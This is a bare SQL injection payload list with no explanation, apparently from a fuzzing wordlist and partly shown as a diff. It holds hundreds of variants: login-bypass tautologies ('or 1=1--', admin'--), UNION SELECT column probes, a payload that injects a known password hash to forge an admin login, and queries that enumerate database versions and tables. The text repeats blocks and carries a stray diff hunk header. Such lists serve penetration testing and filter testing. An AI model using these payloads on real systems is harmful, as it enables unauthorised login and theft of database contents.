'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
